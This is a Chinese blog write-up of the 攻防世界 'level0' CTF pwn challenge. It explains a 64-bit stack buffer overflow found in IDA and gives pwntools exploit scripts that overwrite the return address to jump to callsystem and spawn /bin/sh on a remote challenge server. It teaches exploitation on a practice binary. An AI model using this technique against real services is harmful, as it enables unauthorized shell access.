pwn level0--沙窝里的王

最新推荐文章于 2023-03-12 17:46:55 发布
最新推荐文章于 2023-03-12 17:46:55 发布
阅读量207 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43600412/article/details/97049222
版权

下载文件后查看属性,发现不认识,语言编译器打开后是一堆64位编码,看不到信息,载入IDA查看主函数的C语言形式:
显示读入“hello world”,下面的 vulnerable_function函数有hello world作为参数,点开后却发现与hello world没多大关系:
在这里插入图片描述
程序显示buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。
shift+F12查找字符串:
在这里插入图片描述因上图中 rodata 地址出现 /bin/sh 文件夹字样,查找该字符所被调用的函数,结果查到函数callsystem函数:
在这里插入图片描述查看该函数C语言形式:
在这里插入图片描述因此,可以在read时,将函数返回地址覆盖为callsystem函数地址,则可实现漏洞利用:
写的脚本如下:

from pwn import *
p = process('./level0')
# p = remote("111.198.29.45","31008")
call_system = 0x400596
payload = 0x88*'a' + p64(call_system)
p.sendline(payload)
p.interactive()

该脚本大意:
首先导入pwn的工具啦,因为需要用到一些pwn的程序,将level文件导入连接,或者可以直接用remote()连接到那道题,实现栈覆盖
运行:
在这里插入图片描述
毫无反应,推测返回地址错误,看vulnerable_function()函数汇编代码:
在这里插入图片描述
在retn之前还有一个leave指令,也就是说,在函数返回之前,有一次pop操作,要通过read函数覆盖返回地址,则还需将push指令的内容覆盖,ELF文件为64位程序,pop指令后64位2进制出栈,即8个字符大小(push类似),payload = ‘a’*(0x80 + 8) + p64(sysaddr)
修改exp如下:

from pwn import *
 
p = remote('111.198.29.45',33907)
elf = ELF('./level0')
sysaddr = elf.symbols['callsystem']
payload = 'a'*(0x80 + 8) + p64(sysaddr)
p.recv()
p.send(payload)
p.interactive()

运行;
在这里插入图片描述得到flag。
脚本注释:

from pwn import *  #导入pwntools中pwn包的所有内容
 
p = remote('111.198.29.45',33907)  # 链接服务器远程交互,等同于nc ip 端口 命令
elf = ELF('./level0')  # 以ELF文件格式读取level0文件
sysaddr = elf.symbols['callsystem']  # 获取ELF文件中callsystem标记的地址
payload = 'a'*(0x80 + 8) + p64(sysaddr)  # payload,先用0x88个无用字符覆盖buf和push中的内容,之后再覆盖返回地址
p.recv()  #接收输出
p.send(payload)  # 发送payload
p.interactive()  # 反弹shell进行交互
沙窝李
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1463
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
攻防世界PWN题——level0
Greic的博客
12-01 3492
嘿嘿,又是我,我又肥来了。今天带来的是攻防世界第三题的writeup,这次话不多说,我们直接进入主题。 无论怎么样,pwn题前两步少不了——查看文件类型和保护类型: 64位linux操作系统,只开了NX保护,再打开IDA看看。 将Hello,World显示到屏幕上,再点开函数看看: 可以看到,buf是分配了80个字节(从rbp-80-rbp+0),但是read函数读入了0x200字节,因此,这明显有栈溢出,再点开buff看看: 可以看到,我们只需要将buf和s覆盖,也就...
pwn_level0
qq_42956710的博客
08-15 2652
level0(deepin解题记录) 打开链接: 判断了下文件类型及其保护 在终端面运行一下: 64位的,所以就用idax64打开 看一下数据位置: 其中有bin/sh, 面有几个函数需要看看,callsystem,main,read,vulnerable_function 栈溢出,由于没有NX保护和开栈保护,为了得到shell,可以找一个输入没有限制的...
攻防世界 Pwn level0
MrTreebook的博客
07-13 145
攻防世界pwn level0 下载本地文件拉到Kali 检查文件 file level0 checksec level0 没有开任何保护 拉进IDA看一下 在这看到了 ”bin/sh" 可以在这获取shell权限 目标明确 看到了vulnerable_function 很明显是栈溢出的操作 看一下栈空间 buf上需要覆盖 80-0+8 大小的数据 r 上弹 callsystem的地址即可 开始写exp ##coding=utf8 from pwn import * ## 构
adworld-pwn-level0
bunner_的博客
10-16 231
工具:kali + IDA + pwndbg + pwntools 1、将文件扔到IDA中,跟着main函数走找到vulnerable_function 上述可以看出来buf的空间只有0x80B,而_read却读入了0x200B的数据,明显的栈溢出 利用shift+F12查看字符串 发现了这玩意,跟过去发现它被callsystem函数调用 那么,我们接下来的操作就是通过栈溢出让vulnerable_function的返回指令返回到callsystem来 根据vulnerable的汇编代码来看
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
level0 -- 攻防世界新手题
01-19
来自攻防世界的pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
JarvisOJ-PWN-Level0
杀生丸?不,其实我要的是桔梗
03-15 775
JarvisOJ-PWN-Level0 IDA打开分析。 在Export找到这两个关键函数。 先双击进入main 关键函数在vulnerable_function(),继续跟进。 可以看出read函数是把标准输入的200位的写入buf中。 再看buf: 低位: 高位: 所以buf的首地址到返回地址共=(+0x0000000000000008) - (-0x00...
BUUCTF pwn——level0
CNS-Enterprise BCC-1701-J
03-12 144
BUUCTF 做题练习
攻防世界-pwn新手区-level0
CHAWUCIREN1的博客
07-26 236
下载附件,执行一下,64位程序 checksec一下 NX执行保护开启 丢进ida面分析一下 F5反编译 发现return到一个函数面,点击查看一下 发现申请的栈空间是0x80,read的值却是0x200,说明存在栈溢出 然后点击callsystem这个函数, 发现shell,也就是说我们需要利用栈溢出覆盖到callsystem函数的返回地址0x400596执行shell。 查看buf的栈空间 shell_addr = 0x400596 payload = ‘A’*(0x80+8) + p.
初学pwn-攻防世界(level0)
天柱的博客
08-27 1006
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1391
学习pwn开始,慢慢来不要急
Jarvis OJ-PWN-[XMAN]level0 wp
分不清东西南北的Laffey
09-22 931
地址:nc pwn2.jarvisoj.com 9881 第一次做pwn的题目 先准备一下环境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先打开虚拟机 把文件放进去用checksec看一下 发现是64位的 程序编译时关了栈不可执行保护 这说明我们可以在buf面输入shellcode和填...
攻防世界pwn level0做题思路
nzw1134864657的博客
07-24 1849
先看看题目的各种保护机制 栈不可以执行,我们用IDA打开看看 写进一个hello world的字符串,然后执行vulnerable_function()函数 跟进函数查看 这我不是特别理解,writeup上是这样写的 “这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址,劫持程序执行流,执行我们想执行的方法。通常我们的目...
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2573
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界pwnlevel0
Sakura给爷pwn全场
09-02 298
查壳64bit 拖进IDA f5查看伪代码 vulnerable_function中文译为脆弱函数,可疑,点进去查看vulnerable函数。 buf数组距离栈帧顶部rsp为0h,距离栈帧顶部rbp为80h,可知buf长度为0x80. 查看vulnerable函数栈 s代表save ebp,长度8个字节 r代表return address,长度8个字节,通常只要覆盖4个字节。 查看callsystem函数,代码段地址为0x400596 思路 把return address用callsystem函数
攻防世界pwn-forgot
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值